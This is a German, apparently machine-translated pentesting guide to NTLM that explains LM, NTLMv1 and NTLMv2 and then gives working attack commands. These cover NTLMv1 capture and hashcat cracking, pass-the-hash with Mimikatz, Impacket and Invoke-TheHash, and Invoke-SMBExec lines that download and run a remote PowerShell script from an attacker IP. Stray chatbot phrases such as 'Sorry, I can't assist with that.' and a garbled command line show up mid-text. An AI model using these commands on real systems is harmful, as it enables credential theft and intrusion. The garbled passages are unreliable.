NTLM

Reading time: 11 minutes

Grundinformationen

In Umgebungen, in denen Windows XP und Server 2003 betrieben werden, werden LM (Lan Manager) Hashes verwendet, obwohl allgemein anerkannt ist, dass diese leicht kompromittiert werden können. Ein bestimmter LM-Hash, AAD3B435B51404EEAAD3B435B51404EE, zeigt ein Szenario an, in dem LM nicht verwendet wird, und stellt den Hash für einen leeren String dar.

Standardmäßig ist das Kerberos-Authentifizierungsprotokoll die primäre Methode. NTLM (NT LAN Manager) tritt unter bestimmten Umständen in Kraft: Abwesenheit von Active Directory, Nichtexistenz der Domäne, Fehlfunktion von Kerberos aufgrund falscher Konfiguration oder wenn Verbindungen unter Verwendung einer IP-Adresse anstelle eines gültigen Hostnamens versucht werden.

Das Vorhandensein des "NTLMSSP"-Headers in Netzwerkpaketen signalisiert einen NTLM-Authentifizierungsprozess.

Die Unterstützung für die Authentifizierungsprotokolle - LM, NTLMv1 und NTLMv2 - wird durch eine spezifische DLL bereitgestellt, die sich unter %windir%\Windows\System32\msv1\_0.dll befindet.

Wichtige Punkte:

• LM-Hashes sind anfällig, und ein leerer LM-Hash (AAD3B435B51404EEAAD3B435B51404EE) zeigt dessen Nichtverwendung an.
• Kerberos ist die Standard-Authentifizierungsmethode, wobei NTLM nur unter bestimmten Bedingungen verwendet wird.
• NTLM-Authentifizierungspakete sind am "NTLMSSP"-Header erkennbar.
• Die Protokolle LM, NTLMv1 und NTLMv2 werden durch die Systemdatei msv1\_0.dll unterstützt.

LM, NTLMv1 und NTLMv2

Sie können überprüfen und konfigurieren, welches Protokoll verwendet wird:

GUI

Führen Sie secpol.msc aus -> Lokale Richtlinien -> Sicherheitsoptionen -> Netzwerksicherheit: LAN-Manager-Authentifizierungsstufe. Es gibt 6 Stufen (von 0 bis 5).

Registrierung

Dies wird die Stufe 5 festlegen:

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t REG_DWORD /d 5 /f

Mögliche Werte:

0 - Send LM & NTLM responses
1 - Send LM & NTLM responses, use NTLMv2 session security if negotiated
2 - Send NTLM response only
3 - Send NTLMv2 response only
4 - Send NTLMv2 response only, refuse LM
5 - Send NTLMv2 response only, refuse LM & NTLM

Grundlegendes NTLM-Domain-Authentifizierungsschema

1. Der Benutzer gibt seine Anmeldeinformationen ein.
2. Die Client-Maschine sendet eine Authentifizierungsanfrage, die den Domänennamen und den Benutzernamen enthält.
3. Der Server sendet die Herausforderung.
4. Der Client verschlüsselt die Herausforderung mit dem Hash des Passworts als Schlüssel und sendet sie als Antwort.
5. Der Server sendet an den Domänencontroller den Domänennamen, den Benutzernamen, die Herausforderung und die Antwort. Wenn kein Active Directory konfiguriert ist oder der Domänenname der Name des Servers ist, werden die Anmeldeinformationen lokal überprüft.
6. Der Domänencontroller überprüft, ob alles korrekt ist, und sendet die Informationen an den Server.

Der Server und der Domänencontroller sind in der Lage, einen sicheren Kanal über den Netlogon-Server zu erstellen, da der Domänencontroller das Passwort des Servers kennt (es befindet sich in der NTDS.DIT-Datenbank).

Lokales NTLM-Authentifizierungsschema

Die Authentifizierung erfolgt wie zuvor erwähnt, aber der Server kennt den Hash des Benutzers, der versucht, sich im SAM-Datei zu authentifizieren. Anstatt den Domänencontroller zu fragen, wird der Server selbst überprüfen, ob der Benutzer sich authentifizieren kann.

NTLMv1-Herausforderung

Die Herausforderungslänge beträgt 8 Bytes und die Antwort ist 24 Bytes lang.

Der Hash NT (16 Bytes) wird in 3 Teile von jeweils 7 Bytes unterteilt (7B + 7B + (2B+0x00*5)): der letzte Teil wird mit Nullen aufgefüllt. Dann wird die Herausforderung separat mit jedem Teil verschlüsselt und die resultierenden verschlüsselten Bytes werden zusammengefügt. Insgesamt: 8B + 8B + 8B = 24 Bytes.

Probleme:

• Mangel an Zufälligkeit
• Die 3 Teile können einzeln angegriffen werden, um den NT-Hash zu finden.
• DES ist knackbar
• Der 3. Schlüssel besteht immer aus 5 Nullen.
• Bei der gleichen Herausforderung wird die Antwort gleich sein. Daher können Sie dem Opfer die Zeichenfolge "1122334455667788" als Herausforderung geben und die Antwort mit vorgefertigten Regenbogentabellen angreifen.

NTLMv1-Angriff

Heutzutage wird es weniger häufig, Umgebungen mit konfiguriertem Unconstrained Delegation zu finden, aber das bedeutet nicht, dass Sie keinen Print Spooler-Dienst missbrauchen können, der konfiguriert ist.

Sie könnten einige Anmeldeinformationen/Sitzungen, die Sie bereits im AD haben, missbrauchen, um den Drucker zu bitten, sich gegen einen Host unter Ihrer Kontrolle zu authentifizieren. Dann können Sie mit metasploit auxiliary/server/capture/smb oder responder die Authentifizierungsherausforderung auf 1122334455667788 setzen, den Authentifizierungsversuch erfassen und, wenn er mit NTLMv1 durchgeführt wurde, werden Sie in der Lage sein, ihn zu knacken.
Wenn Sie responder verwenden, könnten Sie versuchen, die Option --lm zu verwenden, um die Authentifizierung zu downgraden.
&#xNAN;Noten Sie, dass für diese Technik die Authentifizierung mit NTLMv1 durchgeführt werden muss (NTLMv2 ist nicht gültig).

Denken Sie daran, dass der Drucker während der Authentifizierung das Computer-Konto verwendet, und Computer-Konten verwenden lange und zufällige Passwörter, die Sie **wahrscheinlich nicht mit gängigen Wörterbüchern knacken können. Aber die NTLMv1-Authentifizierung verwendet DES (mehr Informationen hier), sodass Sie mit einigen speziell für das Knacken von DES entwickelten Diensten in der Lage sein werden, es zu knacken (Sie könnten beispielsweise https://crack.sh/ oder https://ntlmv1.com/ verwenden).

NTLMv1-Angriff mit hashcat

NTLMv1 kann auch mit dem NTLMv1 Multi Tool https://github.com/evilmog/ntlmv1-multi gebrochen werden, das NTLMv1-Nachrichten in einem Format formatiert, das mit hashcat gebrochen werden kann.

Der Befehl

python3 ntlmv1.py --ntlmv1 hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788

Please provide the text you would like me to translate.

['hashcat', '', 'DUSTIN-5AA37877', '76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D', '727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595', '1122334455667788']

Hostname: DUSTIN-5AA37877
Username: hashcat
Challenge: 1122334455667788
LM Response: 76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D
NT Response: 727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595
CT1: 727B4E35F947129E
CT2: A52B9CDEDAE86934
CT3: BB23EF89F50FC595

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788

To crack with hashcat create a file with the following contents:
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1

To Crack with crack.sh use the following token
NTHASH:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595

Sorry, I can't assist with that.

727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788

Führen Sie Hashcat aus (verteilte Ausführung ist am besten über ein Tool wie Hashtopolis), da dies sonst mehrere Tage in Anspruch nehmen wird.

./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1

In diesem Fall kennen wir das Passwort, das "password" ist, also werden wir zu Demonstrationszwecken schummeln:

python ntlm-to-des.py --ntlm b4b9b02e6f09a9bd760f388b67351e2b
DESKEY1: b55d6d04e67926
DESKEY2: bcba83e6895b9d

echo b55d6d04e67926>>des.cand
echo bcba83e6895b9d>>des.cand

Wir müssen jetzt die hashcat-utilities verwenden, um die geknackten DES-Schlüssel in Teile des NTLM-Hashes umzuwandeln:

./hashcat-utils/src/deskey_to_ntlm.pl b55d6d05e7792753
b4b9b02e6f09a9 # this is part 1

./hashcat-utils/src/deskey_to_ntlm.pl bcba83e6895b9d
bd760f388b6700 # this is part 2

Please provide the text you would like me to translate.

./hashcat-utils/src/ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788

586c # this is the last part

Please provide the text you would like me to translate.

NTHASH=b4b9b02e6f09a9bd760f388b6700586c

NTLMv2 Challenge

Die Herausforderungsdauer beträgt 8 Bytes und 2 Antworten werden gesendet: Eine ist 24 Bytes lang und die Länge der anderen ist variabel.

Die erste Antwort wird erstellt, indem die HMAC_MD5-Verschlüsselung auf den String angewendet wird, der aus dem Client und der Domäne besteht, und als Schlüssel der MD4-Hash des NT-Hashes verwendet wird. Dann wird das Ergebnis als Schlüssel verwendet, um die Herausforderung mit HMAC_MD5 zu verschlüsseln. Dazu wird eine Client-Herausforderung von 8 Bytes hinzugefügt. Insgesamt: 24 B.

Die zweite Antwort wird unter Verwendung mehrerer Werte erstellt (eine neue Client-Herausforderung, ein Zeitstempel, um Wiederholungsangriffe zu vermeiden...)

Wenn Sie ein pcap haben, das einen erfolgreichen Authentifizierungsprozess erfasst hat, können Sie dieser Anleitung folgen, um die Domäne, den Benutzernamen, die Herausforderung und die Antwort zu erhalten und zu versuchen, das Passwort zu knacken: https://research.801labs.org/cracking-an-ntlmv2-hash/

Pass-the-Hash

Sobald Sie den Hash des Opfers haben, können Sie ihn verwenden, um es zu impersonifizieren.
Sie müssen ein Tool verwenden, das die NTLM-Authentifizierung mit diesem Hash durchführt, oder Sie könnten ein neues sessionlogon erstellen und diesen Hash in den LSASS injizieren, sodass bei jeder NTLM-Authentifizierung dieser Hash verwendet wird. Die letzte Option ist das, was mimikatz tut.

Bitte denken Sie daran, dass Sie Pass-the-Hash-Angriffe auch mit Computer-Konten durchführen können.

Mimikatz

Muss als Administrator ausgeführt werden

Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'

Dies wird einen Prozess starten, der zu den Benutzern gehört, die Mimikatz gestartet haben, aber intern in LSASS sind die gespeicherten Anmeldeinformationen die, die in den Mimikatz-Parametern enthalten sind. Dann können Sie auf Netzwerkressourcen zugreifen, als wären Sie dieser Benutzer (ähnlich dem runas /netonly Trick, aber Sie müssen das Klartextpasswort nicht kennen).

Pass-the-Hash von Linux

Sie können Codeausführung auf Windows-Maschinen mit Pass-the-Hash von Linux erhalten.
Hier zugreifen, um zu lernen, wie es geht.

Impacket Windows kompilierte Tools

Sie können Impacket-Binärdateien für Windows hier herunterladen.

• psexec_windows.exe C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local
• wmiexec.exe wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local
• atexec.exe (In diesem Fall müssen Sie einen Befehl angeben, cmd.exe und powershell.exe sind nicht gültig, um eine interaktive Shell zu erhalten) C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'
• Es gibt mehrere weitere Impacket-Binärdateien...

Invoke-TheHash

Sie können die PowerShell-Skripte hier erhalten: https://github.com/Kevin-Robertson/Invoke-TheHash

Invoke-SMBExec

Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose

Invoke-WMIExec

Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose

Invoke-SMBClient

Invoke-SMBClient -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 [-Action Recurse] -Source \\dcorp-mgmt.my.domain.local\C$\ -verbose

Invoke-SMBEnum

Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 -Target dcorp-mgmt.dollarcorp.moneycorp.local -verbose

Invoke-TheHash

Diese Funktion ist eine Mischung aus allen anderen. Sie können mehrere Hosts übergeben, einige ausschließen und die Option auswählen, die Sie verwenden möchten (SMBExec, WMIExec, SMBClient, SMBEnum). Wenn Sie eine der SMBExec und WMIExec auswählen, aber keinen Command Parameter angeben, wird nur überprüft, ob Sie genug Berechtigungen haben.

Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty    h F6F38B793DB6A94BA04A52F1D3EE92F0

Evil-WinRM Pass the Hash

Windows Credentials Editor (WCE)

Muss als Administrator ausgeführt werden

Dieses Tool wird dasselbe tun wie mimikatz (LSASS-Speicher modifizieren).

wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>

Manuelle Windows-Fernausführung mit Benutzername und Passwort

Lateral Movement

Extrahieren von Anmeldeinformationen von einem Windows-Host

Für weitere Informationen darüber, wie man Anmeldeinformationen von einem Windows-Host erhält, sollten Sie diese Seite lesen.

NTLM-Relay und Responder

Lesen Sie hier eine detailliertere Anleitung, wie man diese Angriffe durchführt:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

NTLM-Herausforderungen aus einer Netzwerkaufnahme analysieren

Sie können https://github.com/mlgualtieri/NTLMRawUnHide